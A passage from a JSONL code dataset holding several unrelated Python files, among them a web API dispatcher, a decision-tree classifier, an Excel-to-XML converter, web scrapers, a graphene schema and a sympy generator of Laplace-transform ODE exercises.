momentum.fatcatmap.handlers import WebHandler\nfrom momentum.fatcatmap.core.adapters.format.json import FCMJSONAdapter\n\n_api_services = {}\njsapi_cache = None\n\n\nclass FatcatmapAPIDispatcher(WebHandler):\n\tpass\n\t\nclass JavascriptAPIDispatcher(WebHandler):\n\t\n\t''' Returns a rendered JavaScript template to initialize the the JSAPI environment with server-side values. '''\n\t\n\t@cached_property\n\tdef fcmServicesConfig(self):\n\t\treturn self.config.get('momentum.fatcatmap.services')\n\t\n\t@cached_property\n\tdef globalServicesConfig(self):\n\t\treturn self.config.get('momentum.services')\n\t\n\tdef get(self):\n\t\t\n\t\tglobal jsapi_cache\n\t\t\t\t\n\t\t## Generate list of services to expose to user\n\t\tsvcs = []\n\t\topts = {}\n\n\t\tif jsapi_cache is not None:\n\t\t\treturn jsapi_cache\n\t\telse:\n\t\t\tjsapi = memcache.get('jsapi-main')\n\t\t\tif jsapi is not None:\n\t\t\t\treturn jsapi\n\t\t\telse:\n\t\t\t\tfor name, config in self.fcmServicesConfig['services'].items():\n\t\t\t\t\tif config['enabled'] is True:\n\n\t\t\t\t\t\tsecurity_profile = self.globalServicesConfig['middleware_config']['security']['profiles'].get(config['config']['security'], None)\n\t\t\t\t\n\t\t\t\t\t\tcaching_profile = self.globalServicesConfig['middleware_config']['caching']['profiles'].get(config['config']['caching'], None)\n\n\t\t\t\t\t\tif security_profile is None:\n\n\t\t\t\t\t\t\t## Pull default profile if none is specified\n\t\t\t\t\t\t\tsecurity_profile = self.globalServicesConfig['middleware_config']['security']['profiles'][self.globalServicesConfig['defaults']['service']['config']['security']]\n\n\t\t\t\t\t\tif caching_profile is None:\n\t\t\t\t\t\t\tcaching_profile = self.globalServicesConfig['middleware_config']['caching']['profiles'][self.globalServicesConfig['defaults']['service']['config']['caching']]\n\n\t\t\t\t\t\t## Add caching to local opts\n\t\t\t\t\t\topts['caching'] = caching_profile['activate'].get('local', False)\n\n\t\t\t\t\t\t## Grab prefix\n\t\t\t\t\t\tservice_action = self.fcmServicesConfig['config']['url_prefix'].split('/')\n\n\t\t\t\t\t\t## Add service name\n\t\t\t\t\t\tservice_action.append(name)\n\t\t\t\t\n\t\t\t\t\t\t## Join into endpoint URL\n\t\t\t\t\t\tservice_action_url = '/'.join(service_action)\n\n\t\t\t\t\t\t## Expose depending on security profile\n\t\t\t\t\t\tif security_profile['expose'] == 'all':\n\t\t\t\t\t\t\tsvcs.append((name, service_action_url, config, opts))\n\n\t\t\t\t\t\telif security_profile['expose'] == 'admin':\n\t\t\t\t\t\t\tif users.is_current_user_admin():\n\t\t\t\t\t\t\t\tsvcs.append((name, service_action_url, config, opts))\n\t\t\t\t\t\t\n\t\t\t\t\t\telif security_profile['expose'] == 'none':\n\t\t\t\t\t\t\tcontinue\n\t\t\n\t\t\t\tjsapi = self.render('snippets/page_object.js', services=svcs, content_type='text/javascript', script_tag=False)\n\t\t\t\tmemcache.set('jsapi-main', jsapi)\n\t\t\t\tjsapi_cache = jsapi\n\t\t\t\treturn jsapi","sub_path":"app/momentum/fatcatmap/handlers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"56678257","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import metrics\nimport Classification_utils\n\ndataset = pd.read_csv('../data/combinedData.csv')\ntargets = pd.read_csv('../data/targets.csv')\ndrop_ids = ['Chart_12','Chart_23',\n 'Closure_28','Closure_43','Closure_46','Closure_90',\n 'Lang_23','Lang_25','Lang_56',\n 'Math_12','Math_35','Math_61','Math_104',\n 'Time_2','Time_11', 'Time_23', 'Mockito_1','Mockito_2','Mockito_3',\n 'Mockito_4','Mockito_5','Mockito_6','Mockito_7','Mockito_8','Mockito_9',\n 'Mockito_10','Mockito_11','Mockito_12','Mockito_13','Mockito_14',\n 'Mockito_15','Mockito_16','Mockito_17','Mockito_18','Mockito_19',\n 'Mockito_20','Mockito_21','Mockito_22','Mockito_23','Mockito_24',\n 'Mockito_25','Mockito_26','Mockito_27','Mockito_28','Mockito_29',\n 'Mockito_30','Mockito_31','Mockito_32','Mockito_33','Mockito_34',\n 'Mockito_35','Mockito_36','Mockito_37', 'Mockito_38']\ndataset = dataset.query('id not in @drop_ids')\ndataset.sort_values('id', inplace=True)\ndataset.reset_index(drop=True, inplace=True)\nX = dataset.drop('id', axis=1)\n\ntargets = targets.query('id not in @drop_ids')\ntargets.sort_values('id', inplace=True)\ntargets.reset_index(drop=True, inplace=True)\ny = targets['nr_to_examine_dstar_2']\ny = Classification_utils.get_class_labels_coarse_grained(y)\nclass_names = Classification_utils.get_coarse_grained_class_names()\n#cc.print_iterable(y)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\nimp = Imputer(missing_values=\"NaN\", strategy=\"mean\", axis=0)\nX_train = imp.fit_transform(X_train)\nX_test = imp.fit_transform(X_test)\n\ntree = DecisionTreeClassifier(max_depth=3, min_weight_fraction_leaf=0.05)\nprint('F1 scores during cross validation')\nscores = cross_val_score(estimator=tree, X=X_train, y=y_train, scoring='f1')\nprint(scores)\n\ntree.fit(X_train, y_train)\ny_pred = tree.predict(X_test)\n\nprint('-------Score on training data')\nprint(tree.score(X_train, y_train))\nprint('********************* Scores on the test set *********************')\nprint('F1 score [0, 1]')\nprint(metrics.f1_score(y_test, y_pred))\nprint('Accuracy score (fraction and number of correct predictions)')\nprint(metrics.accuracy_score(y_test, y_pred))\nprint(metrics.accuracy_score(y_test, y_pred, normalize=False))\n\nimport plot_confusion_matrix as plt_cm\ncm = metrics.confusion_matrix(y_test, y_pred)\nplt_cm.plot_confusion_matrix(cm, classes=class_names,\n title='Confusion Matrix')\nplt_cm.plot_confusion_matrix(cm, classes=class_names,\n title='Normalized Confusion Matrix',\n normalize=True)\n\nfrom sklearn.tree import export_graphviz\nexport_graphviz(tree, out_file='../results/decisionTree/classification_tree.dot',\n feature_names=X.columns,\n filled=True, rounded=True,\n special_characters=True)\n","sub_path":"DecisionTree/DecisionTreeClassification_coarseGrained.py","file_name":"DecisionTreeClassification_coarseGrained.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"510786471","text":"import sys\r\nimport converter\r\nimport os\r\nimport os\r\nimport glob\r\nimport datetime\r\nimport random\r\nimport shutil\r\n\r\ninput_path = sys.argv[1]\r\noutput_path = sys.argv[2]\r\nerror_dir = sys.argv[3]\r\narchival_dir = sys.argv[4]\r\nenv = sys.argv[5]\r\n\r\n#find the newst file in the input directory\r\nfiles = glob.glob(input_path + '\\\\*.[Xx][Ll][Ss][Xx]')\r\nif len(files) == 0:\r\n print('Nothing to do here, no files')\r\n exit(0) \r\ninput_path = max(files,key=os.path.getctime)\r\ntd = datetime.datetime.today()\r\noutput_filename = 'filename' + '.xml'\r\n\r\n#raises if file is open\r\ntry: \r\n input_path_temp = input_path + 'temp'\r\n os.rename(input_path, input_path_temp)\r\n os.rename(input_path_temp, input_path)\r\nexcept OSError:\r\n print(\"Input file is open: \" + input_path)\r\n print(\"Can't move input file, please instruct to close file\")\r\n\r\n raise\r\n###\r\nxl_filename = output_filename[:-4] + '.xlsx'\r\nxml_filepath = output_path+ '\\\\' + output_filename\r\ntry:\r\n with open(xml_filepath,'wb') as f:\r\n \r\n contents = converter.convert_to_xml(input_path)\r\n f.write(contents)\r\n\r\n print('success! Moving file to :' + xml_filepath)\r\n shutil.copyfile(input_path,archival_dir + '\\\\' + xl_filename)\r\nexcept:\r\n print('error when converting excel to xml')\r\n shutil.copyfile(input_path, error_dir + '\\\\' + xl_filename)\r\n print(\"file moved to error folder:\" + error_dir)\r\n raise\r\nfinally:\r\n os.remove(input_path)\r\n \r\n\t\r\n# Error handling: I am assuming that exceptions raised by any part of the code\r\n","sub_path":"converterTool.py","file_name":"converterTool.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146545016","text":"import requests as rq\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nimport time\n\n\nurl = \"https://data.kma.go.kr/data/mrz/mrzRltmList.do?pgmNo=645\"\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument(\"--single-process\")\nchrome_options.add_argument(\"--disable-dev-shm-usage\")\n\n\nchrome_driver_path =(r\"/home/ubuntu/hanium-seungsoo/map/grid/chromedriver\")\ndriver = webdriver.Chrome(chrome_driver_path, options=chrome_options)\ndriver.get(url)\n\n\nhtml = driver.page_source\nsoup = BeautifulSoup(html, 'html.parser')\n\n#tbl = soup.find('table','tbl')\n#print(tbl.get_text())\n#print(type(tbl))\n\ntable00 = pd.read_html(url)\ndf00 = pd.DataFrame(table00[0])\nprint(df00)\ndf00.to_csv('df/df00.csv', encoding='utf-8')\n\n\n#버튼 클릭 이벤트(03시 조회)\nhbutton = driver.find_element_by_link_text(\"h003\")\nprint(hbutton)\nhbutton.click()\n\nsearchbutton = driver.find_element_by_css_selector(\"#dsForm > div.wrap_btn > button\")\nprint(searchbutton)\nsearchbutton.click()\ntbl = soup.find('table','tbl')\ntb_text = tbl.get_text()\nprint(tb_text)\nprint(type(tb_text))\n\ndf03 = pd.DataFrame([x.split('\\n') for x in tb_text.split('\\n\\n')])\nprint(df03[0:6].head(2)) \n\n\n\n#table03 = pd.read_html(url)\n#df03 = pd.DataFrame(table03[0])\n#print(df03)\n#df03.to_csv('df/df03.csv', encoding='utf-8')\n\n","sub_path":"grid/py_crawling.py","file_name":"py_crawling.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"358599393","text":"# not IPython notebook\nimport matplotlib\nmatplotlib.use('PDF')\nmatplotlib.rcParams['font.size'] = 18\nmatplotlib.rcParams['axes.titlesize'] = 18\nfrom sympy import symbols, Heaviside as H, factor, apart, latex, Function, diff, expand_mul\nfrom sympy import laplace_transform as LT,inverse_laplace_transform as ILT, plot, simplify\nfrom sympy import Basic, Rational, collect, solve, numer, denom, init_printing\nfrom random import choice\nfrom numpy import poly, array, linspace\nfrom tempfile import mkstemp\n\ny,Y = symbols(\"y,Y\", cls=Function)\nt = symbols(\"t\", positive=True)\ns = symbols(\"s\")\ny1,y2 = symbols(\"y_1,y_2\", cls=Function)\n\n\ndef choice_except(a,b,exvals=None):\n R = range(a,b+1)\n if exvals:\n R = set(R) - set(exvals) \n return choice(list(R))\n\ndef to_str(n):\n if abs(n) !=1:\n return \"%+d \\,\" %n\n else:\n return \"+\" if n==1 else \"-\" \n\ndef odelatex(a2,a1,a0):\n s=\"%d \\, y''(t)\" %a2 if abs(a2)!=1 else (\"y''(t)\" if a2==1 else \"-y''(t)\")\n if a1:\n s = s + \"%s y'(t)\" %to_str(a1)\n if a0: \n s = s + \"%s y(t)\" %to_str(a0)\n return s\n\ndef params(realroots=True,continuous=False):\n r1,r2=choice_except(-4,-1),choice_except(-3,0)\n if not realroots:\n if r2 == 0:\n r2=choice_except(-3,-1)\n kk1=complex(r1,r2); kk2=complex(r1,-r2)\n r1,r2=kk1,kk2\n cp=poly((r1,r2))\n brk1,brk2 = choice([1,2,3]),choice([4,5,6])\n k1 = choice_except(1,3)\n if not continuous:\n k2 = choice_except(-3,-1)\n else:\n k2 = Rational(-k1*brk1,brk2-brk1)\n y0 = choice_except(-2,2)\n yd0 = choice_except(-2,2,(0,)) if (y0==0) else choice_except(-2,2)\n return cp,(brk1,brk2),(k1,k2),(y0,yd0)\n\n\ndef ilt_pfe(Lpf):\n Ife = []\n for pf in Lpf:\n Ife.append(ILT(pf,s,t))\n return sum(Ife)\n\n\ndef apart_fact(Fs):\n S=0\n Ls = apart(Fs).as_ordered_terms()\n for l in Ls:\n S += numer(l)/factor(denom(l))\n return expand_mul(S)\n\n\ndef solution(pars):\n (a2,a1,a0),(t1,t2),(k1,k2),(y0,yd0)=pars\n a2,a1,a0 = map(int,[a2,a1,a0])\n den = a2*s**2+a1*s+a0\n V1 = apart(1/s/den).as_ordered_terms() # const.\n V2 = apart(1/s**2/den).as_ordered_terms() # lin.\n Iv1,Iv2 = ilt_pfe(V1),ilt_pfe(V2)\n LIC = (a2*(s*y0+yd0) + a1*y0)/den\n y1 = ILT(LIC, s,t)\n y2 = k1*Iv2 # k1, t\n y3 = (k2-k1)*Iv2.subs(t,t-t1)*H(t-t1) # k2-k1,(t-t1)*H(t-t1)\n y4 = (t1*(k2-k1)-k2*t2)*Iv1.subs(t,t-t1)*H(t-t1) # t1*(k2-k1)-k2*t2,H(t-t1), nulove pre spojite\n y5 = -k2*Iv2.subs(t,t-t2)*H(t-t2) # -k2, (t-t2)*H(t-t2)\n y = expand_mul(simplify(y1+y2+y3+y4+y5))\n return y\n\n\ndef formulation(pars):\n (a2,a1,a0),(t1,t2),(k1,k2),(y0,yd0)=pars\n # a2,a1,a0 = map(int,[a2,a1,a0])\n # LS = latex(a2*diff(y(t),t,2) + a1*diff(y(t),t) + a0*y(t),order='rev-lex')\n LS = odelatex(a2,a1,a0)\n f1, f2 = latex(k1*t), latex(-k2*(t2-t))\n Zstr=r\"\"\"Riešme rovnicu $%s = f(t)$ s počiatočnými podmienkami\n $$y(0)=%d,\\, y'(0)=%d.$$ \n Pravá strana $f(t)$ je daná rovnicami:\n $$f(t)=\\left\\{{\n \\begin{array}{ll}\n %s & \\mbox{ pre } 0\\le t \\le %d,\\\\\n \\displaystyle{%s} & \\mbox{ pre } %d < t \\le %d,\\\\\n %s & \\mbox{ pre } t \\ge %d.\n \\end{array}\n }\\right. $$\n \"\"\" %(LS,y0,yd0,f1,t1,f2,t1,t2,latex(0),t2)\n return Zstr\n\n\ndef plotexprt(ft,sings=[],depth=10,xlabel='t',ylabel='y(t)'):\n P=plot(ft,singularities=sings,depth=depth,xlabel=xlabel,ylabel=ylabel)\n\ndef plotnp(ft,t1,t2, xlab=r'$t$',ylab=r'$y(t)$',npts=200):\n tn = linspace(t1,t2,npts)\n yn = array([ft(ta) for ta in tn],dtype='float')\n plot(tn,yn)\n xlabel(xlab); ylabel(ylab)\n\ndef explanation(pars,for_tex=False):\n (a2,a1,a0),(t1,t2),(k1,k2),(y0,yd0)=pars\n a2,a1,a0 = map(int,[a2,a1,a0])\n Chpol = a2*s**2+a1*s+a0\n r12 = solve(Chpol,s)\n if len(r12)==2:\n r1,r2=r12\n else:\n r1=r12[0]; r2=r1\n # nezavisle od parametrov \n realroots = (complex(r1).imag == 0)\n kps = t1*(k2-k1)-k2*t2\n continuous = (kps == 0)\n \n if not for_tex:\n beg_eqn = r\"$$\\begin{eqnarray*}\"\n end_eqn = r\"\\end{eqnarray*}$$\"\n else:\n beg_eqn = r\"\\begin{eqnarray*}\"\n end_eqn = r\"\\end{eqnarray*}\" \n Lls = Chpol * Y(s)\n IC = a1*y0+s*y0+yd0\n ict = IC/Chpol\n y0t = simplify(ILT(ict,s,t))\n if realroots:\n y0t = H(t)*expand_mul(simplify(y0t/H(t)))\n if not continuous:\n V1 = apart(1/s/Chpol).as_ordered_terms()\n Iv1 = ilt_pfe(V1)\n y1t = expand_mul(simplify(Iv1/H(t)))\n V2 = apart(1/s**2/Chpol).as_ordered_terms(); Iv2 = ilt_pfe(V2)\n y2t = expand_mul(simplify(Iv2/H(t)))\n if realroots:\n icpfe=latex(apart_fact(ict))\n else:\n icpfe=latex(ict)\n if not continuous:\n Ykstr=r\"\"\"%s\n Y_0(s) &=& %s,\\\\\n Y_1(s) &=& \\frac{1}{s (%s)},\\\\ \n Y_2(s) &=& \\frac{1}{s^2 (%s)}.\\\\\n %s\"\"\" %(beg_eqn,latex(ict),latex(Chpol),latex(Chpol),end_eqn)\n ytstr=r\"\"\"%s\n y_0(t) &=& %s,\\\\ \n y_1(t) &=& \\theta(t) \\left({%s}\\right),\\\\\n y_2(t) &=& \\theta(t) \\left({%s}\\right).\\\\\n %s\"\"\" %(beg_eqn,latex(y0t,fold_func_brackets=True), \n latex(y1t,fold_func_brackets=True),\n latex(y2t,fold_func_brackets=True),end_eqn)\n pfestr=r\"\"\"%s\n Y_0(s) &=& %s,\\\\\n Y_1(s) &=& %s,\\\\ \n Y_2(s) &=& %s.\\\\\n %s\"\"\" %(beg_eqn,icpfe,latex(apart(1/s/Chpol)),latex(apart(1/s**2/Chpol)),end_eqn) \n else:\n Ykstr=r\"$$Y_0(s) = %s,\\ Y_1(s) = \\frac{1}{s^2 (%s)}.$$\" %(latex(ict),latex(Chpol))\n ytstr=r\"\"\"%s\n y_0(t) &=& %s,\\\\\n y_1(t) &=& \\theta(t) \\left({%s}\\right).\\\\\n %s\"\"\" %(beg_eqn,latex(y0t,fold_func_brackets=True),\n latex(y2t,fold_func_brackets=True),end_eqn)\n pfestr=r\"$$Y_0(s) =%s,\\ Y_1(s) = %s.$$\" %(icpfe,latex(apart_fact(1/s**2/Chpol)))\n ic1,ic2 = s*Y(s)- y0, s**2*Y(s) - y0*s - yd0\n f = k1*t*(H(t)-H(t-t1))+k2*(t-t2)*(H(t-t1)-H(t-t2))\n ct1,ct2=factor((k2-k1)*(t-t1)),factor(-k2*(t-t2))\n fh =k1*t*H(t)+ct1*H(t-t1)+ct2*H(t-t2)\n if not continuous:\n fh = fh + kps*H(t-t1)\n Lfh = expand_mul(LT(fh,t,s)[0])\n y2t1 = y2t.subs(t,t-t1); y2t2 = y2t.subs(t,t-t2)\n if not continuous:\n y1t1 = y1t.subs(t,t-t1)\n yt = y0t + k1*y2t + (k2-k1)*y2t1*H(t-t1) - k2*y2t2*H(t-t2)\n if not continuous:\n yt = yt + kps*y1t1*H(t-t1)\n yder = diff(y0t/H(t),t)*H(t) + k1*diff(y2t,t)*H(t)+(k2-k1)*diff(y2t1,t)*H(t-t1)-k2*diff(y2t2,t)*H(t-t2)\n if not continuous:\n yder = yder + kps*diff(y1t1,t)*H(t-t1)\n \n yder2 = diff(y0t/H(t),t,2)*H(t) + k1*diff(y2t,t,2)*H(t)+(k2-k1)*diff(y2t1,t,2)*H(t-t1)-k2*diff(y2t2,t,2)*H(t-t2)\n if not continuous:\n yder2 = yder2 + kps*diff(y1t1,t,2)*H(t-t1)\n if continuous: \n sol2 = latex(k1 * y1(t) + (k2-k1)*y1(t-t1) - k2 * y1(t-t2))\n else:\n sol2 = latex(k1 * y2(t) + (k2-k1)*y2(t-t1) - k2 * y2(t-t2) + kps*y1(t-t1))\n sol2 = sol2.replace('\\\\operatorname','')\n if kps < 0:\n SolStr = \"y(t) = y_0(t) \" + sol2\n else: \n SolStr = \"y(t) = y_0(t) + \" + sol2\n \n Fcheck=a2*yder2+a1*yder+a0*yt\n Is_solution=simplify(Fcheck-f)\n Estr=[r\"\"\"Nech $y(t) \\rightarrow Y(s)$. Pre transformáciu ľavej strany použijeme vzorce:\n %s\n y'(t) &\\rightarrow & s Y(s)- y(0)=%s,\\\\ \n y''(t) &\\rightarrow & s^2 Y(s) - s y(0) -y'(0)= %s.\\\\\n %s\"\"\" %(beg_eqn,latex(ic1), latex(ic2),end_eqn),\n r\"\"\"Pravú stranu prepíšeme pomocou Heavisideovho skoku $\\theta(t)\\,$ takto:\n $$f(t)=%s.$$\n Keď chceme mať rovnaké posunutia vo funkcii aj v Heavisidovom skoku, upravíme to\n $$f(t)=%s.$$\n Je to treba kvôli použitiu pravidla o posunutí originálu\n $$\\mbox{ ak } f(t) \\rightarrow F(s), \n \\mbox{ potom } f(t-a) \\rightarrow \\mathrm{e}^{-a s} F(s),$$\n pre transformáciu pravej strany.\n Teraz môžeme napísať L-transformovanú rovnicu (nezlomkové členy vznikli z počiatočných podmienok, ktoré sme zahrnuli do pravej strany):\n $$%s = %s.$$\n \"\"\" %(latex(f),latex(fh),latex(Lls),latex(Lfh +a1*y0 +s* y0 + yd0)),\n r\"\"\"Korene charakteristickej rovnice sú $r_1=%s,\\, r_2=%s.$\n Vzhľadom na horeuvedené pravidlo o posunutí originálu a linearitu L-transformácie \n stačí hľadať originály len pre výrazy %s\n Urobili by sme to rozkladom na elementárne zlomky, ale robotu nám ušetrí softvér\n ($\\textit{sympy}$) a dostaneme %s\n Pre originály máme %s\n Nakoniec, použitím pravidla o posunutí a linearity L-transformácie dostaneme celkové riešenie\n $$%s.$$ \n Pomocou $\\textit{sympy}$ overíme, či je to riešenie. Je, lebo rozdiel ľavej a pravej strany je $%s$.\n \"\"\" %(latex(r1),latex(r2),Ykstr, pfestr, ytstr, SolStr, latex(Is_solution))\n ]\n return Estr[0]+Estr[1]+Estr[2], t1, t2, f, yt, yder, yder2 \n\ndef save_plots(t1,t2,f,yt,yder,yder2):\n Pf = plot((f,(t,0,t2+1)),title=r\"$f(t)$\",xlabel=\"\",ylabel=\"\",show=False) # vypis formulacie\n Py = plot((yt,(t,0,t2+1)),depth=12,title=r\"$y(t)$\",xlabel=\"\",ylabel=\"\",show=False)\n Pdy = plot((yder,(t,0,t2+1)),title=r\"$y'(t)$\",xlabel=\"\",ylabel=\"\",show=False)\n Pddy = plot((yder2,(t,0,t2+1)),sings=[t1,t2],title=r\"$y''(t)$\",xlabel=\"\",ylabel=\"\",show=False)\n ffn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n yfn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n dyfn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n ddyfn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n Pf.save(ffn)\n Py.save(yfn)\n Pdy.save(dyfn)\n Pddy.save(ddyfn)\n return ffn, yfn, dyfn, ddyfn\n\ndef plot_riesenie(t1,t2,yt,yder,yder2):\n Py = plot((yt,(t,0,t2+1)),depth=12,title=r\"$y(t)$\",xlabel=\"\",ylabel=\"\")\n Pdy = plot((yder,(t,0,t2+1)),title=r\"$y'(t)$\",xlabel=\"\",ylabel=\"\")\n Pddy = plot((yder2,(t,0,t2+1)),sings=[t1,t2],title=r\"$y''(t)$\",xlabel=\"\",ylabel=\"\")\n\ndef to_latex(pars,fname=\"odediscont.tex\"):\n Z = formulation(pars)\n Estr, t1, t2, f, yt, yder, yder2 = explanation(pars,for_tex=True)\n ffn, yfn, dyfn, ddyfn = save_plots(t1, t2, f, yt, yder, yder2)\n header = r\"\"\"\\documentclass[a4paper,10pt]{article}\n \\usepackage[utf8]{inputenc}\n \\usepackage[T1]{fontenc}\n \\usepackage[slovak]{babel}\n \\usepackage{a4wide}\n \\usepackage{graphicx}\n \\begin{document}\n \n \\noindent\n \"\"\"\n LtxStr=header + Z + Estr\n of = open(fname,'w')\n of.write(LtxStr)\n of.flush()\n PlotStr=r\"\"\"\\begin{figure}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\caption{Pravá strana a riešenie.}\n \\end{figure}\n \\begin{figure}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\caption{Prvá a druhá derivácia riešenia.}\n \\end{figure} \n \"\"\" % (ffn, yfn, dyfn, ddyfn)\n of.write(PlotStr + r\"\\end{document}\") \n of.close()\n ","sub_path":"ode_lap_discont.py","file_name":"ode_lap_discont.py","file_ext":"py","file_size_in_byte":10881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"401441448","text":"from random import randint \ndef rzucKostka():\n rzut = randint(1,6)\n return rzut\noczko = 0\nsuma = 0\nfor i in range(3):\n oczko = rzucKostka()\n suma += oczko\n print(oczko,end=' ')\nprint(f'Suma: {suma}')","sub_path":"04-Subroutines/dc_17.py","file_name":"dc_17.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"344117758","text":"import graphene \nfrom graphene_django import DjangoObjectType\nfrom rest.models import Students,School\nimport json\n# from django.core import serializers\n\nclass StudentsType(DjangoObjectType):\n class Meta:\n model=Students\n\nclass SchoolType(DjangoObjectType):\n class Meta:\n model=School\n\nclass Query(graphene.ObjectType):\n AllStudents=graphene.List(StudentsType,Sname=graphene.String())\n\n AllSchools=graphene.List(SchoolType)\n\n\n def resolve_AllSchools(root,info):\n return School.objects.all()\n\n def resolve_AllStudents(root,info, Sname):\n print(Sname,\"dggggggggdg\")\n return Students.objects.all()\n\n\nclass CreateStudent(graphene.Mutation):\n class Arguments:\n sname=graphene.String()\n sage=graphene.Int()\n std=graphene.Int()\n school=graphene.String()\n \n ok=graphene.Boolean()\n data=graphene.Field(StudentsType)\n\n def mutate(self, info, sname,sage,std,school):\n scl=School.objects.get(name=school)\n v1=Students(name=sname,age=sage,standard=std,school=scl)\n v1.save() \n data=v1\n ok=True\n return CreateStudent(ok=ok,data=data)\n\n\n\nclass Mutation(graphene.ObjectType):\n newStudent=CreateStudent.Field()\n\nschema=graphene.Schema(query=Query,mutation=Mutation)\n\n","sub_path":"endpoint/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"216970504","text":"import requests\n\nfrom prototypes.Setting import Setting\nfrom prototypes.cell.Cell import Cell\nfrom utils.Exceptions import UrlNotSetException\n\n\nclass Requestor(Cell):\n\n def __init__(self, identifier='Unknown', input_cell=None, input_cells=None,\n url='http://www.baidu.com', params=None, timeout=1, proxy=None):\n \"\"\"\n Requestor unit for collect data.\n :param url:\n :param params:\n :param timeout:\n :param proxy:\n -\n inflow: __hash (url / params / proxy)\n outflow: __selector / __hash (/ response)\n \"\"\"\n super().__init__(identifier, input_cell=input_cell, input_cells=input_cells)\n self.load_selector()\n if not params:\n params = {}\n self.setting = Setting(url=url, params=params, timeout=timeout, proxy=proxy)\n\n def filter(self, data):\n response = self.__request(**data)\n __hash = data.get('__hash')\n if response and response.status_code == 200:\n return {\n '__selector': 'default',\n '__hash': __hash,\n 'response': response\n }\n else:\n return {\n '__selector': 'fail',\n '__hash': __hash\n }\n\n def __request(self, url=None, params=None, proxy=None, **kwargs):\n __url = url if url else self.setting.get('url')\n __params = dict(self.setting.get('params'))\n if params:\n __params.update(params)\n __timeout = self.setting.get('timeout')\n __proxy = proxy if proxy else self.setting.get('proxy')\n try:\n if not __url:\n raise UrlNotSetException\n response = requests.get(url=__url, params=__params, timeout=__timeout, proxies=__proxy)\n return response\n except Exception as e:\n self.raise_exception(e)\n","sub_path":"prototypes/cell/Requestor.py","file_name":"Requestor.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"461722923","text":"#-*-coding:utf-8-*-\n\"\"\"\nThis code is utf8\n\"\"\"\nimport imp\nimport json\nimport urllib2\nimport os\nimport sys\nfrom thePath import rootPath\nsys.path.append(rootPath + \"lib\")\nfrom superLogger import Logger\n\nclass GQBT(object):\n \"\"\"\n This is GQBT class\n \"\"\"\n def __init__(self):\n self.useragent = (\"Mozilla/5.0 (Linux; Android 6.0;\"\n \" Nexus 5 Build/MRA58N) AppleWebKit/537.36\"\n \" (KHTML, like Gecko) \"\n \"Chrome/60.0.3112.113 Mobile Safari/537.36\")\n self.headers = {'User-Agent':self.useragent}\n B = imp.load_source('Directory', rootPath + \\\n 'script/siteproc/car_4s/lib/Directory.py')\n class_drectory = B.GetDir()\n self.outFile = class_drectory.getDirectory()+\"GQBT.json\"\n self.loginfo = Logger(rootPath + \\\n \"temp/debugLog/\", \"CAR4S\")\n \n def getHtml(self, url):\n \"\"\"\n This function is tio get html from url\n Args:\n url\n Return:\n page code\n \"\"\"\n try:\n request = urllib2.Request(url, headers = self.headers)\n response = urllib2.urlopen(request)\n pageCode = response.read()\n return pageCode\n except urllib2.URLError as e:\n if hasattr(e, \"reason\"):\n self.loginfo.error(e)\n return None\n \n def saveFile(self, item):\n \"\"\"\n This is save file\n \"\"\"\n fp = open(self.outFile, 'a')\n li = json.dumps(item, ensure_ascii=False) + '\\n'\n fp.write(li.encode('utf8'))\n fp.close()\n \n def saveText(self, strbject):\n \"\"\"\n This is save text\n \"\"\"\n s = strbject.split(\"\\n\")\n for sdata in s:\n fp = open(self.outFile, 'a')\n fp.write(sdata + \"\\n\")\n fp.close()\n \n def getPageItems(self, url):\n \"\"\"\n This function is to get page items\n Args:\n url\n Return:\n json data\n \"\"\"\n pageCode = self.getHtml(url) \n if not pageCode:\n self.loginfo.error('GQBT page is null')\n return\n strpage = pageCode.split(\"var global_dealers_data =\")\n str1 = strpage[1]\n str2 = str1.split(\"var AllCar_data=\")\n str3 = str2[0]\n pageItem = str3[1:len(str3)-4]\n pa = pageItem.replace(\"},{\", \"}\\n{\")\n s = pa.split(\"\\n\")\n for sdata in s:\n self.saveText(sdata)\n \n def main_spider(self):\n \"\"\"\n This is main spider\n \"\"\"\n if os.path.exists(self.outFile):\n os.system(\"rm \" + self.outFile)\n self.loginfo.debug('the GQBT is doing crawling')\n self.getPageItems(\"http://www.ghac.cn/js/Official/staticData/p_c_dealers_data.js\")\n self.loginfo.debug('the GQBT is doing ending')\n\n\nif __name__ == '__main__':\n spider = GQBT()\n spider.main_spider()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n 